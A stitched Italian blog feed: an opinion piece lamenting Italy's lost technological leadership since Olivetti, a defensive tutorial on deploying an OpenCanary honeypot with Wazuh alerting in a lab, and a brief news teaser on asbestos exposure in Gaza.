Gli italiani hanno lasciato un’impronta indelebile nella storia della tecnologia, senza trascurare il nostro ricco patrimonio artistico. Ma concentriamoci sulla tecnologia. Ogni volta che scorro i social e vedo immagini dell’Olivetti, dell’Elea o del P101, è un tripudio di nostalgia per ciò che siamo stati.
Simboli di un’epoca in cui l’Italia era all’avanguardia. Un faro luminoso nell’oscurità del panorama italiano e dell’informatica mondiale.
Il team del Programma 101. Seduti: Perotto (a sx) e De Sandre. Dietro: Garziera (a sx) e Toppi.
Ma oggi cosa siamo?
A cinquant’anni di distanza, quelle imprese sembrano appartenere a un’altra epoca, quasi un sogno sbiadito che pochi ricordano vividamente. L’Italia tecnologica, un tempo protagonista, oggi appare come una piccola barca alla deriva in un oceano dominato dai giganti dell’innovazione, aggrappata ai ricordi di un passato glorioso ma incapace di catturare il vento per navigare verso nuove dimensioni.
Perché questo declino?
È una domanda che in molti si pongono.
Certamente, la globalizzazione ha rimescolato le carte, e la concorrenza è diventata sempre più spietata. Ma è anche vero che l’Italia sembra aver perso la sua capacità di innovare, di rischiare, di guardare al futuro. Ancora oggi, le nostre menti brillano all’estero, dove trovano le risorse e gli incentivi che mancano nel nostro Paese. Un paradosso amaro: l’Italia esporta i suoi cervelli migliori, indebolendo il proprio sistema produttivo e arricchendo le economie straniere.
Come un Uroboro
Si, siamo come un uroboro: un serpente che si morde la coda, intrappolati in un ciclo infinito di emigrazione del talento e mancata valorizzazione. Un serpente che consuma le sue stesse convinzioni, quelle di non essere all’altezza di tentare il cambiamento.
Un’immagine (Uroboro) disegnata nel 1478 da Theodoros Pelecanos in un trattato alchemico intitolato Synosius (Fonte wikipedia)
Eppure, basterebbe alzare lo sguardo per vedere che il mondo è cambiato e le regole del gioco non sono più quelle di una volta. Oggi, la tecnologia è la vera chiave del potere, più delle armi nucleari. Avanza a una velocità vertiginosa, e chi non riesce a tenere il passo viene inesorabilmente travolto. Noi siamo già stati travolti e, in un certo senso, sembra che ci stia bene.
Considerarci una colonia tecnologica, confinata da un lato o dall’altro di un muro digitale, può sembrare comodo. Rimanere fermi, senza avviare il cambiamento, ci fa sentire al sicuro in una comfort zone dove solo l’immobilismo dimora. Da anni non varchiamo quel confine, quando invece dovremmo “osare” di più, guardare avanti e smettere di vivere solo nei ricordi di “ciò che eravamo”.
Dobbiamo iniziare a costruire un futuro in cui ricordare chi siamo, qui, ora.
Programma 101 rilasciato dalla Olivetti tra il 1962 e il 1964
Il mondo cambia: sfruttiamo il cambiamento
Chi avrebbe mai immaginato, 25 anni fa, che i telefoni Nokia sarebbero scomparsi dagli scaffali? E chi avrebbe pensato che marchi storici come Xerox, Kodak, Sega e Commodore avrebbero ceduto il passo a nuove aziende tecnologiche? Probabilmente nessuno. La tecnologia si evolve rapidamente e strategie errate, insieme a convinzioni obsolete, possono condurre al fallimento, lasciando spazio liberi agli altri.
Mi viene in mente la Ferrari degli anni bui, quelli degli anni ’80, quando le sconfitte si accumulavano. Eppure, perseverando nell’innovazione e senza demoralizzarsi, giorno dopo giorno, la scuderia ha ritrovato la sua forza, culminando nel 2002 con Michael Schumacher, che vinse 15 dei 16 Gran Premi in programma. Chi lo avrebbe mai detto nel 1985 all’epoca di Berger e Alboreto?
Certo ci sono voluti 20 anni e non è stato facile, un obiettivo da sempre sognato e con molto sudore raggiunto.
La storia dell’Italia tecnologica è una lezione importante. Ci ricorda che i successi del passato non sono una garanzia per il futuro. Ci insegna che dobbiamo essere sempre pronti ad adattarci, a innovare, a reinventarci e a non mollare mai.
Ricominciare dalle scuole
L’Italia ha un potenziale immenso, ma per esprimerlo davvero serve una “scossa tellurica”, un’iniezione di fiducia. È indispensabile ripensare il modello di sviluppo, puntando sull’innovazione e sulla ricerca. Dobbiamo creare un ecosistema che favorisca l’imprenditorialità, attragga investimenti e valorizzi il talento dei giovani.
E come possiamo riuscirci? Ripartendo dalle scuole.
L’Italia deve essere ‘hackerata’ nel senso più nobile del termine, ripensando profondamente il sistema educativo. La classe dirigente di oggi è stata formata 30 o 40 anni fa, in un contesto ormai superato. È urgente riprogettare l’istruzione, perché è sulle fondamenta dell’istruzione che si costruisce il futuro.
Non dobbiamo pensare solo a domani, ma guardare oltre, proiettandoci a tra dieci anni. Anche se non è facile e richiede investimenti e tanti sacrifici.
Ci vorrà tempo, ma se lavoriamo con ispirazione, impegno e costanza, tra 20 anni potremo dire di aver riconquistato il nostro posto nel mondo, proprio come ha fatto la Ferrari. Perché il futuro ci appartiene: siamo italiani.
L'articolo Dall’Olivetti al Nulla: L’Italia che Vive di Nostalgia e ha Perso la Bussola per l’Innovazione proviene da il blog della sicurezza informatica.
Nella trappola virtuale! Come gli Honeypot migliorano la sicurezza della tua rete
Se possiamo definirlo in poche parole direi che l’HoneyPot è un succulento dolcetto in bella vista pronto ad essere azzannato. Infatti contiene dei servizi e vulnerabilità comuni che hanno l’obiettivo di attirare l’attenzione un aggressore che volesse eseguire una ricognizione nei nostri sistemi o possibili movimenti laterali.
Grazie a questa esca, una volta che l’aggressore esegue attività di ricognizione come scansioni, attacchi brute force ecc…, queste vengono prontamente comunicati alla vittima in modo che possa prendere le adeguate contromisure e conoscere l’esistenza di un ospite indesiderato.
Queste esche possono essere posizionate su un qualunque perimetro, come per esempio DMZ, nelle reti IT oppure nelle reti OT. Infatti queste ultime per esempio reti più difficili da monitorare e a difendere rispetto alle altre ovviamente per la tipologia di dispositivi collegati.
Ovviamente a seconda di dove piazziamo queste sonde, dobbiamo usare quelle giuste.
Infatti possono essere delle applicazioni che imitano altre, che emulano servizi comuni in ambito IT oppure altre in ambito OT che emulano sistemi PLC o SCADA con vulnerabilità conosciute.
Come funzionano gli honeypot?
Un honeypot è progettato per replicare un vero sistema informatico.
Questo può spesso essere sotto forma di una pagina di accesso, oppure servizi o applicazioni aziendali tipicamente conosciute e interessanti per gli aggressori, incluse credenziali semplici facili da “exploitare”.
Quando un aggressore effettua il login, l’honeypot rileverà tale attività e invierà immediatamente un avviso all’IT o a un team di sicurezza, fornendo visibilità e tracciando il comportamento.
Questo comportamento potrebbe essere un attacco diretto o un movimento laterale verso un altro sistema compromesso che la vittima non ha avuto evidenza.
Tipi di Honeypot
Esistono due tipi principali di design di honeypot:
Gli honeypot di produzione è la tipologia più comune. Questa tipologia raccoglie dati sulla sicurezza informatica all’interno della rete di produzione di un’organizzazione con l’obiettivo di identificare tentativi di compromissione e raccogliere dati sui criminali informatici, come indirizzi IP di origine, frequenza del traffico e altro. Un honeypot di produzione funge da esca, mimetizzandosi con il resto dei sistemi e servizi legittimi nelle reti dove viene inserito.
Gli honeypot di ricerca in genere raccolgono più dati degli honeypot di produzione, con l’obiettivo specifico di raccogliere informazioni sulle tecniche degli aggressori.
Mentre le aziende in genere utilizzano honeypot di produzione, il governo e le organizzazioni di ricerca possono utilizzare un honeypot di ricerca.
Honeypot a bassa e alta interazione
All’interno di queste due categorie, ci sono anche diversi tipi di honeypot per vari livelli di complessità.
Gli honeypot ad alta interazione gestiscono una varietà di sistemi di produzione reali progettati per attirare gli aggressori. Un team di ricerca può utilizzare honeypot ad alta interazione per apprendere gli strumenti utilizzati da un aggressore. Tuttavia, gli honeypot ad alta interazione richiedono una notevole quantità di tempo e sforzi per essere impostati e mantenuti, il che non li rende adatti a team più piccoli o meno esperti.
Gli honeypot a bassa interazione, sono relativamente più semplici da implementare perché sono ambienti molto più statici. Mentre un honeypot ad alta interazione agisce essenzialmente come un sistema reale e offre agli aggressori l’opportunità di interagire con una varietà di servizi, un honeypot a bassa interazione offre agli aggressori un accesso limitato al sistema operativo ed emula solo una piccola quantità di servizi e protocolli. Pertanto non sono così efficaci e approfonditi; invece, sono più utili per rilevare minacce meno complesse come i bot, scansioni e ricognizioni comuni.
Vantaggi degli Honeypot
Gli honeypot sono uno dei meccanismi di rilevamento più potenti che una rete possa avere. Un honeypot completamente configurato può aiutare a rilevare e permettere fermare gli attacchi informatici con estrema precisione.
La presenza di avvisi provenienti dagli honeypot è un chiara segnalazione di un intrusione senza senza alcun dubbio.
Se si dovessero ricevere segnalazioni da queste sonde, si tratterebbe di sicuro di un attacco reale, di un utente curioso oppure di un test di sicurezza pianificato.
Inoltre rende la vita più difficile agli aggressori. Gli honeypot tendono a frustrare gli aggressori facendo perdere tempo in questo asset controllato, consentendo alla vittima di conoscere questa attività in corso e prendere le dovute contromisure.
Svantaggi degli Honeypot
Ci sono alcuni rischi e limitazioni nell’uso degli honeypot, specialmente se vengono distribuiti in modo improprio.
A volte richiedono hardware per essere implementati quindi potrebbero essere costosi. Sebbene gli honeypot siano generalmente leggeri in termini di risorse, gli honeypot più complessi, come gli honeypot ad alta interazione e di ricerca, necessitano di hardware per apparire il più realistici possibile.
La manutenzione e configurazione possono richiedere tempo in quanto configurare e gestire gli honeypot, di nuovo può richiedere molto tempo, impegno e competenza.
Creiamo un vero HoneyPot da ZERO
Ora arriviamo al pezzo forte e passiamo alla parte pratica.
Anche se se ne parla poco, di honeypot se ne trovano molti, e di questi molti sono progetti open source. Possiamo in questa repository divisi per ambiti e applicazioni:
github.com/paralax/awesome-hon…
Possiamo trovare infatti progetti molto verticali, come CitrixHoneypot, specifiche per alcune tipologie di reti come Conpot verticalizzati sulle reti OT.
Nel nostro esempio utilizzeremo OpenCanary, un honeypot a bassa interazione che emulerà porte comuni esposte in un server, utile da inserire per esempio in qualche subnet critica della nostra rete, come quella dei server o DMZ.
Alcune porte che possono essere emulate e monitorate sono:
- Git: porta 9418
- Ftp: porta 21
- Http: porta 80
- Https: porta 443
- Squid: porta 8080
- Mysql: porta 3306
- Ssh: porta 22
- Redis: porta 6379
- Rdp: porta 3389
- Sip: porta 5060
- Snmp: porta 161
- Ntp: porta 123
- Tftp: porta 69
- Tcp banner: porta 8001
- Telnet: porta 23
- Microsoft SQL Server: porta 1433
- Vnc: porta 5000
Le porte sono ovviamente tutte personalizzabili.
Cosa è necessario per creare questo laboratorio:
- Una macchina virtuale con Ubuntu 24 dove verrà installato OpenCanary.
- Una macchina con Wazuh dove riceveremo i log (l’installazione è rapida basta seguire questa guida documentation.wazuh.com/curren…)
Installazione di Open Canary
Come accennato, OpenCanary è un honeypot di rete multiprotocollo OpenSource.
github.com/thinkst/opencanary
OpenCanary non fornirà nessun strumento di alert integrato ma solo i log dei rilevamento che poloperà in un suo log, lo agganciamo a Wazuh, un SIEM (sarebbe più corretto dire che è un XDR) in cui raccogliamo questi dati per poi visualizzarle anche in delle semplici dashboard.
Come da wiki eseguiamo questi comandi per installare i pacchetti necessari e installare OpenCanary:
sudo apt-get install python3-dev python3-pip python3-virtualenv python3-venv python3-scapy libssl-dev libpcap-dev
virtualenv env/
. env/bin/activate
pip install opencanary
Se volessimo attivare in seguito i moduli Windows File Share e SNMP installiamo anche questi pacchetti:
sudo apt install samba
pip install scapy pcapy-ng
creiamo la configurazioni iniziale
opencanaryd --copyconfig
Con questo comando verrà creato il file di configurazione al seguente percorso:
/etc/opencanaryd/opencanary.conf
Aprendolo possiamo abilitare modulo per modulo, impostando “modulo.enabled=true” come visualizzato
qui sotto.
Da notare il primo parametro device.node_id servirà in seguito per identificare se ci fossero più sonde. In questo caso ho configurato tutto per poter utilizzare un id numerico, come ad esempio opencanary-1, opencanary-2 ecc…
In questo file possiamo personalizzare anche il file di log, ma non è necessario.
NB: per attivare i moduli non devono esserci altri servizi che utilizzino le porte impostate, per esempio se si volessero monitorare gli accessi SSH è necessario modificare la vera porta standard SSH.
Ora possiamo avviare il programma ogni volta che non sia in esecuzione con i comandi:
. env/bin/activate
opencanaryd --start
Possiamo verificare le porte che sono state aperte direttamente da netstat.
Se abbiamo abilitato http, possiamo fare un test veloce accedendo via web al server. Comparirà un finto accesso a un nas Synology, un target molto ghiotto per chi lo rilevi in rete (che ci siano i backup?).
Questa interfaccia grafica per esempio è completamente personalizzabile per emulare portali differenti, se provassimo ora a eseguire un accesso con qualsiasi credenziale l’attività verrà riportata al seguente file.
\var\tmp\opencanary.log
Di default viene generato un log come questo:
{“dst_host”:”192.168.50.131″,”dst_port”:80,”local_time”:”2024-10-04 13:21:09.282481″,”local_time_adjusted”:”2024-10-04 13:21:09.282929″,”logdata”:{“HOSTNAME”:”192.168.50.131″,”PATH”:”/index.html”,”SKIN”:”nasLogin”,”USERAGENT”:”Mozilla/5.0 (compatible; Nmap Scripting Engine; nmap.org/book/nse.html)”},”logtype”:3000,”node_id”:”opencanary-1″,”src_host”:”192.168.50.133″,”src_port”:52362,”utc_time”:”2024-10-04 13:21:09.282890″}
I valori principali sono il node_id che indica la soda da quale è arrivato l’alert, src_host che indica da dove è partito l’attacco e logtype.
Questo ultimo valore non è documentato benissimo, ma identifica alcuni gruppi di attività.
Analizzando dei dati ricevuti nei test esempio log_type può assumere il significato:
3000 = apertura del applicativo web
5001 = scansione di rete
3001 = tentativo di login
Configurazione agent di Wazuh
Come prerequisito, avevamo indicato è necessario predisporre un’installazione di Wazuh, pulita o già in uso che sia.
Quindi sulla macchina Ubuntu 24 andiamo ad installare il suo agente con questo comando:
wget packages.wazuh.com/4.x/apt/poo… && sudo WAZUH_MANAGER='192.168.50.137' WAZUH_AGENT_NAME='OpenCanary' dpkg -i ./wazuh-agent_4.8.0-1_amd64.deb
dove WAZUH manager è IP del server Wazuh.
Una volta installato aggiungiamo alla fine del file di configurazione questo codice, che farà in modo allagent di monitorare questo file che OpenCanary andrà a popolare:
/var/ossec/etc/ossec.conf
Qui trovate una referenza: documentation.wazuh.com/curren…
Quindi andremo a metterci alla fine questa configurazione:
Salviamo e avviamo/riavviamo il servizio agent
systemctl restart wazuh-agent
Configurazione Wazuh server
Infine ora andiamo a configurare Wazuh per collezionare i log e visualizzarli in una dashboard, in quanto come abbiamo detto il progetto non integra nessun modo avvisi.
La fortuna che abbiamo è che Opencanary genererà un file json al percorso con i log dei rilevamenti \var\tmp\opencanary.log come nell’esempio sottostante.
Wazuh nativamente dispone già di una “rule” e “decoder” per catturare questi dati in questo formato.
L’unica cosa che dobbiamo fare invece è fare in modo che Wazuh una volta acquisiti i dati che li importi, quindi dobbiamo impostare il livello di alert.
Quindi accedendo alle roles dalla dashboard
aggiungendo alle regole locali nelle local_rules.xml.
Questa configurazione:
La regola come è stata messa sopra il 10000 come da documentazione per le regole custom, ma è necessario verificare che non siano già state inserite regole con lo stesso ID.
Referenza sulle custom rule: documentation.wazuh.com/curren…
Ora testando di nuovo la regola possiamo vedere che è stata filtrata correttamente e una volta che verrà generato questo evento verrà importata.
In questo esempio ho catalogato semplicemente tutti gli eventi che contengono un node_id definito, si potrebbe anche suddividere gli eventi per log_type impostando una descrizione e level differente per ciascuno.
Testiamo infine il funzionamento
A questo punto possiamo provare a utilizzare NMAP per scansionare i servizi e far generare attività di ricognizione e bruteforce.
Per prima cosa analizziamo porte e aperti e servizi attivi, possiamo vedere che le nostre porte aperte viste sopra con netstat vengono rilevate e identificate da NMAP.
Con una scansione più intrusiva invece possiamo attivare più alert possibili.
Questi alert infine possiamo rilevarli tramite funzione di discovery.
A questo punto possiamo vedere graficamente queste attività anomale che arrivano dalla sonda come negli esempi sottostanti.
Ho creato al volo delle semplici dashboard partendo dai dati acquisiti, così la visibilità di questi eventi sarà molto più facile e immediata.
Conclusione
In questo articolo abbiamo accennato a cosa siano e cosa servono gli honeypot, mostrando anche un caso pratico di utilizzo.
Questi dispositivi generando pochissimi falsi positivi, in quanto generalmente nessuno dovrebbe essere interessato ad accedervi come descritto prima, possono essere veramente utili al fine di rilevare attività sospette all’interno delle reti informatiche.
L'articolo Nella trappola virtuale! Come gli Honeypot migliorano la sicurezza della tua rete proviene da il blog della sicurezza informatica.
reshared this
GAZA. L’amianto rilasciato dai bombardamenti ucciderà per decenni
@Notizie dall'Italia e dal mondo
Mentre Israele torna all'offensiva nel nord della Striscia, la popolazione è esposta alle particelle rilasciate nell'aria. Inalate, possono causare tumori per pagineesteri.it/2024/10/14/med…
Notizie dall'Italia e dal mondo reshared this.